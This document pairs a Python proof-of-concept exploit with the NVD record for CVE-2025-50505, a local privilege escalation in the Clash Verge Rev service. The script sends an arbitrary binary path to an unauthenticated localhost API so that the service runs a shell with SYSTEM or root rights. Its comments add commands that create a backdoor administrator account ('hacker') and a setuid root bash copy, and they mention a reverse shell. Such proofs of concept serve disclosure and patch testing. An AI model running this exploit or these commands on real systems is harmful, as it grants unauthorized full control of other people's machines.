CVE-2025-50505

#!/usr/bin/env python3 # CVE-2025-50505 - Clash Verge Rev Local Privilege Escalation PoC # Exploits unauthorized /start_clash HTTP API to execute arbitrary binary with SYSTEM privileges import requests import sys import os TARGET_HOST = "127.0.0.1" # Clash Verge service listens on localhost by default TARGET_PORT = 33219 # Default port for clash-verge-service HTTP API def exploit(bin_path): """ Send malicious bin_path to the unauthorized /start_clash endpoint. The service will execute the specified binary with elevated privileges. """ url = f"http://{TARGET_HOST}:{TARGET_PORT}/start_clash" payload = {"bin_path": bin_path} try: response = requests.post(url, json=payload, timeout=5) print(f"[+] Request sent to {url}") print(f"[+] Payload: {payload}") print(f"[+] Response Status: {response.status_code}") print(f"[+] Response Body: {response.text}") if response.status_code == 200: print("[!] Exploit successful! The binary is being executed with elevated privileges.") else: print("[-] Exploit may have failed. Check service status.") except requests.exceptions.ConnectionError: print("[-] Cannot connect to clash-verge-service. Ensure the service is running.") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) < 2: # Default: execute cmd.exe (Windows) or /bin/bash (Linux) as SYSTEM if os.name == "nt": bin_path = "C:\\Windows\\System32\\cmd.exe" else: bin_path = "/bin/bash" print(f"[*] No binary path specified. Using default: {bin_path}") else: bin_path = sys.argv[1] # Step 1: Prepare a payload binary (e.g., add a new admin user or spawn a reverse shell) # On Windows: net user hacker P@ssw0rd /add && net localgroup administrators hacker /add # On Linux: cp /bin/bash /tmp/rootbash && chmod u+s /tmp/rootbash exploit(bin_path)

{"cve": {"id": "CVE-2025-50505", "sourceIdentifier": "[email protected]", "published": "2025-10-07T14:15:37.120", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Clash Verge Rev thru 2.2.3 (fixed in 2.3.0) forces the installation of system services(clash-verge-service) by default and exposes key functions through the unauthorized HTTP API `/start_clash`, allowing local users to submit arbitrary bin_path parameters and pass them directly to the service process for execution, resulting in local privilege escalation."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-250"}]}], "references": [{"url": "https://github.com/bron1e/CVE-2025-50505", "source": "[email protected]"}, {"url": "https://github.com/cisagov/vulnrichment/issues/206", "source": "[email protected]"}, {"url": "https://github.com/clash-verge-rev/clash-verge-rev", "source": "[email protected]"}, {"url": "https://github.com/clash-verge-rev/clash-verge-service", "source": "[email protected]"}, {"url": "https://www.clashverge.dev/", "source": "[email protected]"}]}}